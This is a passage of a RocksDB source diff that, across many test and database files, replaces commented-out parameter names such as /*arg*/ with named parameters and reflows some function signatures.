/*arg*/) { + "WritableFileWriter::RangeSync:0", [&](void* arg) { if (first_range_sync.load()) { options.env->SleepForMicroseconds(3); first_range_sync.store(false); diff --git a/db/compaction_picker.cc b/db/compaction_picker.cc index 7264ed20c6f..6ee4ebd1f16 100644 --- a/db/compaction_picker.cc +++ b/db/compaction_picker.cc @@ -199,7 +199,7 @@ void CompactionPicker::GetRange(const std::vector& inputs, assert(initialized); } -bool CompactionPicker::ExpandInputsToCleanCut(const std::string& /*cf_name*/, +bool CompactionPicker::ExpandInputsToCleanCut(const std::string& cf_name, VersionStorageInfo* vstorage, CompactionInputFiles* inputs) { // This isn't good compaction @@ -318,7 +318,7 @@ Compaction* CompactionPicker::CompactFiles( Status CompactionPicker::GetCompactionInputsFromFileNumbers( std::vector* input_files, std::unordered_set* input_set, const VersionStorageInfo* vstorage, - const CompactionOptions& /*compact_options*/) const { + const CompactionOptions& compact_options) const { if (input_set->size() == 0U) { return Status::InvalidArgument( "Compaction must include at least one file."); @@ -1581,9 +1581,8 @@ Compaction* FIFOCompactionPicker::PickCompaction( Compaction* FIFOCompactionPicker::CompactRange( const std::string& cf_name, const MutableCFOptions& mutable_cf_options, VersionStorageInfo* vstorage, int input_level, int output_level, - uint32_t /*output_path_id*/, const InternalKey* /*begin*/, - const InternalKey* /*end*/, InternalKey** compaction_end, - bool* /*manual_conflict*/) { + uint32_t output_path_id, const InternalKey* begin, const InternalKey* end, + InternalKey** compaction_end, bool* manual_conflict) { assert(input_level == 0); assert(output_level == 0); *compaction_end = nullptr; diff --git a/db/compaction_picker.h b/db/compaction_picker.h index 44b93d7747b..f44139c2dd9 100644 --- a/db/compaction_picker.h +++ b/db/compaction_picker.h @@ -263,29 +263,27 @@ class NullCompactionPicker : public CompactionPicker { virtual ~NullCompactionPicker() {} // Always return "nullptr" - Compaction* PickCompaction(const std::string& /*cf_name*/, - const MutableCFOptions& /*mutable_cf_options*/, - VersionStorageInfo* /*vstorage*/, - LogBuffer* /*log_buffer*/) override { + Compaction* PickCompaction(const std::string& cf_name, + const MutableCFOptions& mutable_cf_options, + VersionStorageInfo* vstorage, + LogBuffer* log_buffer) override { return nullptr; } // Always return "nullptr" - Compaction* CompactRange(const std::string& /*cf_name*/, - const MutableCFOptions& /*mutable_cf_options*/, - VersionStorageInfo* /*vstorage*/, - int /*input_level*/, int /*output_level*/, - uint32_t /*output_path_id*/, - const InternalKey* /*begin*/, - const InternalKey* /*end*/, - InternalKey** /*compaction_end*/, - bool* /*manual_conflict*/) override { + Compaction* CompactRange(const std::string& cf_name, + const MutableCFOptions& mutable_cf_options, + VersionStorageInfo* vstorage, int input_level, + int output_level, uint32_t output_path_id, + const InternalKey* begin, const InternalKey* end, + InternalKey** compaction_end, + bool* manual_conflict) override { return nullptr; } // Always returns false. virtual bool NeedsCompaction( - const VersionStorageInfo* /*vstorage*/) const override { + const VersionStorageInfo* vstorage) const override { return false; } }; diff --git a/db/compaction_picker_test.cc b/db/compaction_picker_test.cc index 7e981451725..1ced12cfd5d 100644 --- a/db/compaction_picker_test.cc +++ b/db/compaction_picker_test.cc @@ -20,9 +20,7 @@ namespace rocksdb { class CountingLogger : public Logger { public: using Logger::Logv; - virtual void Logv(const char* /*format*/, va_list /*ap*/) override { - log_count++; - } + virtual void Logv(const char* format, va_list ap) override { log_count++; } size_t log_count; }; diff --git a/db/comparator_db_test.cc b/db/comparator_db_test.cc index 83740ffda00..28a2a5658e7 100644 --- a/db/comparator_db_test.cc +++ b/db/comparator_db_test.cc @@ -188,10 +188,10 @@ class DoubleComparator : public Comparator { return -1; } } - virtual void FindShortestSeparator(std::string* /*start*/, - const Slice& /*limit*/) const override {} + virtual void FindShortestSeparator(std::string* start, + const Slice& limit) const override {} - virtual void FindShortSuccessor(std::string* /*key*/) const override {} + virtual void FindShortSuccessor(std::string* key) const override {} }; class HashComparator : public Comparator { @@ -211,10 +211,10 @@ class HashComparator : public Comparator { return -1; } } - virtual void FindShortestSeparator(std::string* /*start*/, - const Slice& /*limit*/) const override {} + virtual void FindShortestSeparator(std::string* start, + const Slice& limit) const override {} - virtual void FindShortSuccessor(std::string* /*key*/) const override {} + virtual void FindShortSuccessor(std::string* key) const override {} }; class TwoStrComparator : public Comparator { @@ -243,10 +243,10 @@ class TwoStrComparator : public Comparator { } return a2.compare(b2); } - virtual void FindShortestSeparator(std::string* /*start*/, - const Slice& /*limit*/) const override {} + virtual void FindShortestSeparator(std::string* start, + const Slice& limit) const override {} - virtual void FindShortSuccessor(std::string* /*key*/) const override {} + virtual void FindShortSuccessor(std::string* key) const override {} }; } // namespace diff --git a/db/db_block_cache_test.cc b/db/db_block_cache_test.cc index f4d61eefe6a..169cadc85c3 100644 --- a/db/db_block_cache_test.cc +++ b/db/db_block_cache_test.cc @@ -47,7 +47,7 @@ class DBBlockCacheTest : public DBTestBase { return options; } - void InitTable(const Options& /*options*/) { + void InitTable(const Options& options) { std::string value(kValueSize, 'a'); for (size_t i = 0; i < kNumBlocks; i++) { ASSERT_OK(Put(ToString(i), value.c_str())); diff --git a/db/db_bloom_filter_test.cc b/db/db_bloom_filter_test.cc index d4b034c5346..e6248a04014 100644 --- a/db/db_bloom_filter_test.cc +++ b/db/db_bloom_filter_test.cc @@ -1057,10 +1057,10 @@ TEST_F(DBBloomFilterTest, OptimizeFiltersForHits) { int32_t non_trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* /*arg*/) { trivial_move++; }); + [&](void* arg) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", - [&](void* /*arg*/) { non_trivial_move++; }); + [&](void* arg) { non_trivial_move++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); CompactRangeOptions compact_options; diff --git a/db/db_compaction_filter_test.cc b/db/db_compaction_filter_test.cc index a25adcc356f..9f751f059fa 100644 --- a/db/db_compaction_filter_test.cc +++ b/db/db_compaction_filter_test.cc @@ -26,9 +26,9 @@ class DBTestCompactionFilter : public DBTestBase { class KeepFilter : public CompactionFilter { public: - virtual bool Filter(int /*level*/, const Slice& /*key*/, - const Slice& /*value*/, std::string* /*new_value*/, - bool* /*value_changed*/) const override { + virtual bool Filter(int level, const Slice& key, const Slice& value, + std::string* new_value, bool* value_changed) const + override { cfilter_count++; return false; } @@ -38,9 +38,9 @@ class KeepFilter : public CompactionFilter { class DeleteFilter : public CompactionFilter { public: - virtual bool Filter(int /*level*/, const Slice& /*key*/, - const Slice& /*value*/, std::string* /*new_value*/, - bool* /*value_changed*/) const override { + virtual bool Filter(int level, const Slice& key, const Slice& value, + std::string* new_value, bool* value_changed) const + override { cfilter_count++; return true; } @@ -50,9 +50,9 @@ class DeleteFilter : public CompactionFilter { class DeleteISFilter : public CompactionFilter { public: - virtual bool Filter(int /*level*/, const Slice& key, const Slice& /*value*/, - std::string* /*new_value*/, - bool* /*value_changed*/) const override { + virtual bool Filter(int level, const Slice& key, const Slice& value, + std::string* new_value, + bool* value_changed) const override { cfilter_count++; int i = std::stoi(key.ToString()); if (i > 5 && i <= 105) { @@ -70,10 +70,8 @@ class DeleteISFilter : public CompactionFilter { // zero-padded to length 10. class SkipEvenFilter : public CompactionFilter { public: - virtual Decision FilterV2(int /*level*/, const Slice& key, - ValueType /*value_type*/, - const Slice& /*existing_value*/, - std::string* /*new_value*/, + virtual Decision FilterV2(int level, const Slice& key, ValueType value_type, + const Slice& existing_value, std::string* new_value, std::string* skip_until) const override { cfilter_count++; int i = std::stoi(key.ToString()); @@ -95,9 +93,9 @@ class SkipEvenFilter : public CompactionFilter { class DelayFilter : public CompactionFilter { public: explicit DelayFilter(DBTestBase* d) : db_test(d) {} - virtual bool Filter(int /*level*/, const Slice& /*key*/, - const Slice& /*value*/, std::string* /*new_value*/, - bool* /*value_changed*/) const override { + virtual bool Filter(int level, const Slice& key, const Slice& value, + std::string* new_value, + bool* value_changed) const override { db_test->env_->addon_time_.fetch_add(1000); return true; } @@ -112,9 +110,9 @@ class ConditionalFilter : public CompactionFilter { public: explicit ConditionalFilter(const std::string* filtered_value) : filtered_value_(filtered_value) {} - virtual bool Filter(int /*level*/, const Slice& /*key*/, const Slice& value, - std::string* /*new_value*/, - bool* /*value_changed*/) const override { + virtual bool Filter(int level, const Slice& key, const Slice& value, + std::string* new_value, + bool* value_changed) const override { return value.ToString() == *filtered_value_; } @@ -128,9 +126,9 @@ class ChangeFilter : public CompactionFilter { public: explicit ChangeFilter() {} - virtual bool Filter(int /*level*/, const Slice& /*key*/, - const Slice& /*value*/, std::string* new_value, - bool* value_changed) const override { + virtual bool Filter(int level, const Slice& key, const Slice& value, + std::string* new_value, bool* value_changed) const + override { assert(new_value != nullptr); *new_value = NEW_VALUE; *value_changed = true; @@ -219,7 +217,7 @@ class DelayFilterFactory : public CompactionFilterFactory { public: explicit DelayFilterFactory(DBTestBase* d) : db_test(d) {} virtual std::unique_ptr CreateCompactionFilter( - const CompactionFilter::Context& /*context*/) override { + const CompactionFilter::Context& context) override { return std::unique_ptr(new DelayFilter(db_test)); } @@ -235,7 +233,7 @@ class ConditionalFilterFactory : public CompactionFilterFactory { : filtered_value_(filtered_value.ToString()) {} virtual std::unique_ptr CreateCompactionFilter( - const CompactionFilter::Context& /*context*/) override { + const CompactionFilter::Context& context) override { return std::unique_ptr( new ConditionalFilter(&filtered_value_)); } @@ -253,7 +251,7 @@ class ChangeFilterFactory : public CompactionFilterFactory { explicit ChangeFilterFactory() {} virtual std::unique_ptr CreateCompactionFilter( - const CompactionFilter::Context& /*context*/) override { + const CompactionFilter::Context& context) override { return std::unique_ptr(new ChangeFilter()); } diff --git a/db/db_compaction_test.cc b/db/db_compaction_test.cc index 898db51ef7a..4c7da8d1b50 100644 --- a/db/db_compaction_test.cc +++ b/db/db_compaction_test.cc @@ -53,7 +53,7 @@ class FlushedFileCollector : public EventListener { FlushedFileCollector() {} ~FlushedFileCollector() {} - virtual void OnFlushCompleted(DB* /*db*/, const FlushJobInfo& info) override { + virtual void OnFlushCompleted(DB* db, const FlushJobInfo& info) override { std::lock_guard lock(mutex_); flushed_files_.push_back(info.file_path); } @@ -282,7 +282,7 @@ TEST_F(DBCompactionTest, TestTableReaderForCompaction) { }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "TableCache::GetTableReader:0", - [&](void* /*arg*/) { num_new_table_reader++; }); + [&](void* arg) { num_new_table_reader++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); for (int k = 0; k < options.level0_file_num_compaction_trigger; ++k) { @@ -838,7 +838,7 @@ TEST_P(DBCompactionTestWithParam, TrivialMoveOneFile) { int32_t trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* /*arg*/) { trivial_move++; }); + [&](void* arg) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Options options = CurrentOptions(); @@ -895,10 +895,10 @@ TEST_P(DBCompactionTestWithParam, TrivialMoveNonOverlappingFiles) { int32_t non_trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* /*arg*/) { trivial_move++; }); + [&](void* arg) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", - [&](void* /*arg*/) { non_trivial_move++; }); + [&](void* arg) { non_trivial_move++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Options options = CurrentOptions(); @@ -994,10 +994,10 @@ TEST_P(DBCompactionTestWithParam, TrivialMoveTargetLevel) { int32_t non_trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* /*arg*/) { trivial_move++; }); + [&](void* arg) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", - [&](void* /*arg*/) { non_trivial_move++; }); + [&](void* arg) { non_trivial_move++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Options options = CurrentOptions(); @@ -1053,10 +1053,10 @@ TEST_P(DBCompactionTestWithParam, ManualCompactionPartial) { int32_t non_trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* /*arg*/) { trivial_move++; }); + [&](void* arg) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", - [&](void* /*arg*/) { non_trivial_move++; }); + [&](void* arg) { non_trivial_move++; }); bool first = true; // Purpose of dependencies: // 4 -> 1: ensure the order of two non-trivial compactions @@ -1067,7 +1067,7 @@ TEST_P(DBCompactionTestWithParam, ManualCompactionPartial) { {"DBCompaction::ManualPartial:5", "DBCompaction::ManualPartial:2"}, {"DBCompaction::ManualPartial:5", "DBCompaction::ManualPartial:3"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) { + "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) { if (first) { first = false; TEST_SYNC_POINT("DBCompaction::ManualPartial:4"); @@ -1198,17 +1198,17 @@ TEST_F(DBCompactionTest, DISABLED_ManualPartialFill) { int32_t non_trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* /*arg*/) { trivial_move++; }); + [&](void* arg) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", - [&](void* /*arg*/) { non_trivial_move++; }); + [&](void* arg) { non_trivial_move++; }); bool first = true; bool second = true; rocksdb::SyncPoint::GetInstance()->LoadDependency( {{"DBCompaction::PartialFill:4", "DBCompaction::PartialFill:1"}, {"DBCompaction::PartialFill:2", "DBCompaction::PartialFill:3"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) { + "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) { if (first) { TEST_SYNC_POINT("DBCompaction::PartialFill:4"); first = false; @@ -1444,10 +1444,10 @@ TEST_P(DBCompactionTestWithParam, TrivialMoveToLastLevelWithFiles) { int32_t non_trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* /*arg*/) { trivial_move++; }); + [&](void* arg) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", - [&](void* /*arg*/) { non_trivial_move++; }); + [&](void* arg) { non_trivial_move++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Options options = CurrentOptions(); @@ -2325,16 +2325,16 @@ TEST_P(DBCompactionTestWithParam, CompressLevelCompaction) { rocksdb::SyncPoint::GetInstance()->SetCallBack( "Compaction::InputCompressionMatchesOutput:Matches", - [&](void* /*arg*/) { matches++; }); + [&](void* arg) { matches++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "Compaction::InputCompressionMatchesOutput:DidntMatch", - [&](void* /*arg*/) { didnt_match++; }); + [&](void* arg) { didnt_match++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", - [&](void* /*arg*/) { non_trivial++; }); + [&](void* arg) { non_trivial++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* /*arg*/) { trivial_move++; }); + [&](void* arg) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Reopen(options); @@ -2496,10 +2496,10 @@ TEST_P(DBCompactionTestWithParam, ForceBottommostLevelCompaction) { int32_t non_trivial_move = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:TrivialMove", - [&](void* /*arg*/) { trivial_move++; }); + [&](void* arg) { trivial_move++; }); rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", - [&](void* /*arg*/) { non_trivial_move++; }); + [&](void* arg) { non_trivial_move++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Options options = CurrentOptions(); @@ -2656,7 +2656,9 @@ TEST_P(DBCompactionDirectIOTest, DirectIO) { }); if (options.use_direct_io_for_flush_and_compaction) { SyncPoint::GetInstance()->SetCallBack( - "SanitizeOptions:direct_io", [&](void* /*arg*/) { readahead = true; }); + "SanitizeOptions:direct_io", [&](void* arg) { + readahead = true; + }); } SyncPoint::GetInstance()->EnableProcessing(); CreateAndReopenWithCF({"pikachu"}, options); diff --git a/db/db_dynamic_level_test.cc b/db/db_dynamic_level_test.cc index 6542db18c02..f968e7fc057 100644 --- a/db/db_dynamic_level_test.cc +++ b/db/db_dynamic_level_test.cc @@ -194,7 +194,7 @@ TEST_F(DBTestDynamicLevel, DynamicLevelMaxBytesBase2) { // Hold compaction jobs to make sure rocksdb::SyncPoint::GetInstance()->SetCallBack( "CompactionJob::Run():Start", - [&](void* /*arg*/) { env_->SleepForMicroseconds(100000); }); + [&](void* arg) { env_->SleepForMicroseconds(100000); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); ASSERT_OK(dbfull()->SetOptions({ {"disable_auto_compactions", "true"}, @@ -378,7 +378,7 @@ TEST_F(DBTestDynamicLevel, DynamicLevelMaxBytesBaseInc) { int non_trivial = 0; rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCompaction:NonTrivial", - [&](void* /*arg*/) { non_trivial++; }); + [&](void* arg) { non_trivial++; }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Random rnd(301); diff --git a/db/db_flush_test.cc b/db/db_flush_test.cc index 0dab8bfe59a..107e82467cb 100644 --- a/db/db_flush_test.cc +++ b/db/db_flush_test.cc @@ -101,7 +101,7 @@ TEST_F(DBFlushTest, FlushInLowPriThreadPool) { std::thread::id tid; int num_flushes = 0, num_compactions = 0; SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BGWorkFlush", [&](void* /*arg*/) { + "DBImpl::BGWorkFlush", [&](void* arg) { if (tid == std::thread::id()) { tid = std::this_thread::get_id(); } else { @@ -110,7 +110,7 @@ TEST_F(DBFlushTest, FlushInLowPriThreadPool) { ++num_flushes; }); SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BGWorkCompaction", [&](void* /*arg*/) { + "DBImpl::BGWorkCompaction", [&](void* arg) { ASSERT_EQ(tid, std::this_thread::get_id()); ++num_compactions; }); diff --git a/db/db_impl.cc b/db/db_impl.cc index 97f9b202405..f770b51ae7f 100644 --- a/db/db_impl.cc +++ b/db/db_impl.cc @@ -595,9 +595,8 @@ Status DBImpl::SetDBOptions( } // return the same level if it cannot be moved -int DBImpl::FindMinimumEmptyLevelFitting( - ColumnFamilyData* cfd, const MutableCFOptions& /*mutable_cf_options*/, - int level) { +int DBImpl::FindMinimumEmptyLevelFitting(ColumnFamilyData* cfd, + const MutableCFOptions& mutable_cf_options, int level) { mutex_.AssertHeld(); const auto* vstorage = cfd->current()->storage_info(); int minimum_level = level; @@ -807,7 +806,7 @@ struct IterState { bool background_purge; }; -static void CleanupIteratorState(void* arg1, void* /*arg2*/) { +static void CleanupIteratorState(void* arg1, void* arg2) { IterState* state = reinterpret_cast(arg1); if (state->super_version->Unref()) { @@ -2191,31 +2190,31 @@ Status DBImpl::GetDbIdentity(std::string& identity) const { } // Default implementation -- returns not supported status -Status DB::CreateColumnFamily(const ColumnFamilyOptions& /*cf_options*/, - const std::string& /*column_family_name*/, - ColumnFamilyHandle** /*handle*/) { +Status DB::CreateColumnFamily(const ColumnFamilyOptions& cf_options, + const std::string& column_family_name, + ColumnFamilyHandle** handle) { return Status::NotSupported(""); } Status DB::CreateColumnFamilies( - const ColumnFamilyOptions& /*cf_options*/, - const std::vector& /*column_family_names*/, - std::vector* /*handles*/) { + const ColumnFamilyOptions& cf_options, + const std::vector& column_family_names, + std::vector* handles) { return Status::NotSupported(""); } Status DB::CreateColumnFamilies( - const std::vector& /*column_families*/, - std::vector* /*handles*/) { + const std::vector& column_families, + std::vector* handles) { return Status::NotSupported(""); } -Status DB::DropColumnFamily(ColumnFamilyHandle* /*column_family*/) { +Status DB::DropColumnFamily(ColumnFamilyHandle* column_family) { return Status::NotSupported(""); } Status DB::DropColumnFamilies( - const std::vector& /*column_families*/) { + const std::vector& column_families) { return Status::NotSupported(""); } diff --git a/db/db_impl_compaction_flush.cc b/db/db_impl_compaction_flush.cc index e04fc6ee93e..68d2831233b 100644 --- a/db/db_impl_compaction_flush.cc +++ b/db/db_impl_compaction_flush.cc @@ -779,7 +779,7 @@ int DBImpl::NumberLevels(ColumnFamilyHandle* column_family) { return cfh->cfd()->NumberLevels(); } -int DBImpl::MaxMemCompactionLevel(ColumnFamilyHandle* /*column_family*/) { +int DBImpl::MaxMemCompactionLevel(ColumnFamilyHandle* column_family) { return 0; } diff --git a/db/db_impl_readonly.cc b/db/db_impl_readonly.cc index e3970306572..d4fe7e702f8 100644 --- a/db/db_impl_readonly.cc +++ b/db/db_impl_readonly.cc @@ -105,7 +105,7 @@ Status DBImplReadOnly::NewIterators( } Status DB::OpenForReadOnly(const Options& options, const std::string& dbname, - DB** dbptr, bool /*error_if_log_file_exist*/) { + DB** dbptr, bool error_if_log_file_exist) { *dbptr = nullptr; // Try to first open DB as fully compacted DB diff --git a/db/db_impl_readonly.h b/db/db_impl_readonly.h index 35f2d1c8586..9bdc95cc874 100644 --- a/db/db_impl_readonly.h +++ b/db/db_impl_readonly.h @@ -36,47 +36,46 @@ class DBImplReadOnly : public DBImpl { std::vector* iterators) override; using DBImpl::Put; - virtual Status Put(const WriteOptions& /*options*/, - ColumnFamilyHandle* /*column_family*/, - const Slice& /*key*/, const Slice& /*value*/) override { + virtual Status Put(const WriteOptions& options, + ColumnFamilyHandle* column_family, const Slice& key, + const Slice& value) override { return Status::NotSupported("Not supported operation in read only mode."); } using DBImpl::Merge; - virtual Status Merge(const WriteOptions& /*options*/, - ColumnFamilyHandle* /*column_family*/, - const Slice& /*key*/, const Slice& /*value*/) override { + virtual Status Merge(const WriteOptions& options, + ColumnFamilyHandle* column_family, const Slice& key, + const Slice& value) override { return Status::NotSupported("Not supported operation in read only mode."); } using DBImpl::Delete; - virtual Status Delete(const WriteOptions& /*options*/, - ColumnFamilyHandle* /*column_family*/, - const Slice& /*key*/) override { + virtual Status Delete(const WriteOptions& options, + ColumnFamilyHandle* column_family, + const Slice& key) override { return Status::NotSupported("Not supported operation in read only mode."); } using DBImpl::SingleDelete; - virtual Status SingleDelete(const WriteOptions& /*options*/, - ColumnFamilyHandle* /*column_family*/, - const Slice& /*key*/) override { + virtual Status SingleDelete(const WriteOptions& options, + ColumnFamilyHandle* column_family, + const Slice& key) override { return Status::NotSupported("Not supported operation in read only mode."); } - virtual Status Write(const WriteOptions& /*options*/, - WriteBatch* /*updates*/) override { + virtual Status Write(const WriteOptions& options, + WriteBatch* updates) override { return Status::NotSupported("Not supported operation in read only mode."); } using DBImpl::CompactRange; - virtual Status CompactRange(const CompactRangeOptions& /*options*/, - ColumnFamilyHandle* /*column_family*/, - const Slice* /*begin*/, - const Slice* /*end*/) override { + virtual Status CompactRange(const CompactRangeOptions& options, + ColumnFamilyHandle* column_family, + const Slice* begin, const Slice* end) override { return Status::NotSupported("Not supported operation in read only mode."); } using DBImpl::CompactFiles; virtual Status CompactFiles( - const CompactionOptions& /*compact_options*/, - ColumnFamilyHandle* /*column_family*/, - const std::vector& /*input_file_names*/, - const int /*output_level*/, const int /*output_path_id*/ = -1) override { + const CompactionOptions& compact_options, + ColumnFamilyHandle* column_family, + const std::vector& input_file_names, + const int output_level, const int output_path_id = -1) override { return Status::NotSupported("Not supported operation in read only mode."); } @@ -84,18 +83,18 @@ class DBImplReadOnly : public DBImpl { return Status::NotSupported("Not supported operation in read only mode."); } - virtual Status EnableFileDeletions(bool /*force*/) override { + virtual Status EnableFileDeletions(bool force) override { return Status::NotSupported("Not supported operation in read only mode."); } virtual Status GetLiveFiles(std::vector&, - uint64_t* /*manifest_file_size*/, - bool /*flush_memtable*/ = true) override { + uint64_t* manifest_file_size, + bool flush_memtable = true) override { return Status::NotSupported("Not supported operation in read only mode."); } using DBImpl::Flush; - virtual Status Flush(const FlushOptions& /*options*/, - ColumnFamilyHandle* /*column_family*/) override { + virtual Status Flush(const FlushOptions& options, + ColumnFamilyHandle* column_family) override { return Status::NotSupported("Not supported operation in read only mode."); } @@ -106,9 +105,9 @@ class DBImplReadOnly : public DBImpl { using DB::IngestExternalFile; virtual Status IngestExternalFile( - ColumnFamilyHandle* /*column_family*/, - const std::vector& /*external_files*/, - const IngestExternalFileOptions& /*ingestion_options*/) override { + ColumnFamilyHandle* column_family, + const std::vector& external_files, + const IngestExternalFileOptions& ingestion_options) override { return Status::NotSupported("Not supported operation in read only mode."); } diff --git a/db/db_impl_write.cc b/db/db_impl_write.cc index 2579cc87cfd..f52bce611a9 100644 --- a/db/db_impl_write.cc +++ b/db/db_impl_write.cc @@ -1002,7 +1002,7 @@ Status DBImpl::ScheduleFlushes(WriteContext* context) { } #ifndef ROCKSDB_LITE -void DBImpl::NotifyOnMemTableSealed(ColumnFamilyData* /*cfd*/, +void DBImpl::NotifyOnMemTableSealed(ColumnFamilyData* cfd, const MemTableInfo& mem_table_info) { if (immutable_db_options_.listeners.size() == 0U) { return; diff --git a/db/db_iter_test.cc b/db/db_iter_test.cc index 88493ccfbfb..1b7c13b06f3 100644 --- a/db/db_iter_test.cc +++ b/db/db_iter_test.cc @@ -2459,7 +2459,7 @@ TEST_F(DBIterWithMergeIterTest, InnerMergeIteratorDataRace1) { // and before an SeekToLast() is called. rocksdb::SyncPoint::GetInstance()->SetCallBack( "MergeIterator::Prev:BeforeSeekToLast", - [&](void* /*arg*/) { internal_iter2_->Add("z", kTypeValue, "7", 12u); }); + [&](void* arg) { internal_iter2_->Add("z", kTypeValue, "7", 12u); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); db_iter_->Prev(); @@ -2494,7 +2494,7 @@ TEST_F(DBIterWithMergeIterTest, InnerMergeIteratorDataRace2) { // mem table after MergeIterator::Prev() realized the mem tableiterator is at // its end and before an SeekToLast() is called. rocksdb::SyncPoint::GetInstance()->SetCallBack( - "MergeIterator::Prev:BeforeSeekToLast", [&](void* /*arg*/) { + "MergeIterator::Prev:BeforeSeekToLast", [&](void* arg) { internal_iter2_->Add("z", kTypeValue, "7", 12u); internal_iter2_->Add("z", kTypeValue, "7", 11u); }); @@ -2532,7 +2532,7 @@ TEST_F(DBIterWithMergeIterTest, InnerMergeIteratorDataRace3) { // mem table after MergeIterator::Prev() realized the mem table iterator is at // its end and before an SeekToLast() is called. rocksdb::SyncPoint::GetInstance()->SetCallBack( - "MergeIterator::Prev:BeforeSeekToLast", [&](void* /*arg*/) { + "MergeIterator::Prev:BeforeSeekToLast", [&](void* arg) { internal_iter2_->Add("z", kTypeValue, "7", 16u, true); internal_iter2_->Add("z", kTypeValue, "7", 15u, true); internal_iter2_->Add("z", kTypeValue, "7", 14u, true); diff --git a/db/db_iterator_test.cc b/db/db_iterator_test.cc index 9d344e7af86..90f43ea374d 100644 --- a/db/db_iterator_test.cc +++ b/db/db_iterator_test.cc @@ -24,7 +24,7 @@ class DBIteratorTest : public DBTestBase { class FlushBlockEveryKeyPolicy : public FlushBlockPolicy { public: - virtual bool Update(const Slice& /*key*/, const Slice& /*value*/) override { + virtual bool Update(const Slice& key, const Slice& value) override { if (!start_) { start_ = true; return false; @@ -44,8 +44,8 @@ class FlushBlockEveryKeyPolicyFactory : public FlushBlockPolicyFactory { } FlushBlockPolicy* NewFlushBlockPolicy( - const BlockBasedTableOptions& /*table_options*/, - const BlockBuilder& /*data_block_builder*/) const override { + const BlockBasedTableOptions& table_options, + const BlockBuilder& data_block_builder) const override { return new FlushBlockEveryKeyPolicy; } }; diff --git a/db/db_memtable_test.cc b/db/db_memtable_test.cc index 5ce3e319122..63d274f6ab5 100644 --- a/db/db_memtable_test.cc +++ b/db/db_memtable_test.cc @@ -121,7 +121,7 @@ class TestPrefixExtractor : public SliceTransform { return separator(key) != nullptr; } - virtual bool InRange(const Slice& /*key*/) const override { return false; } + virtual bool InRange(const Slice& key) const override { return false; } private: const char* separator(const Slice& key) const { diff --git a/db/db_properties_test.cc b/db/db_properties_test.cc index 2b099a39a45..b09fe1ffacc 100644 --- a/db/db_properties_test.cc +++ b/db/db_properties_test.cc @@ -985,9 +985,8 @@ class CountingUserTblPropCollector : public TablePropertiesCollector { return Status::OK(); } - Status AddUserKey(const Slice& /*user_key*/, const Slice& /*value*/, - EntryType /*type*/, SequenceNumber /*seq*/, - uint64_t /*file_size*/) override { + Status AddUserKey(const Slice& user_key, const Slice& value, EntryType type, + SequenceNumber seq, uint64_t file_size) override { ++count_; return Status::OK(); } @@ -1028,9 +1027,8 @@ class CountingDeleteTabPropCollector : public TablePropertiesCollector { public: const char* Name() const override { return "CountingDeleteTabPropCollector"; } - Status AddUserKey(const Slice& /*user_key*/, const Slice& /*value*/, - EntryType type, SequenceNumber /*seq*/, - uint64_t /*file_size*/) override { + Status AddUserKey(const Slice& user_key, const Slice& value, EntryType type, + SequenceNumber seq, uint64_t file_size) override { if (type == kEntryDelete) { num_deletes_++; } @@ -1057,7 +1055,7 @@ class CountingDeleteTabPropCollectorFactory : public TablePropertiesCollectorFactory { public: virtual TablePropertiesCollector* 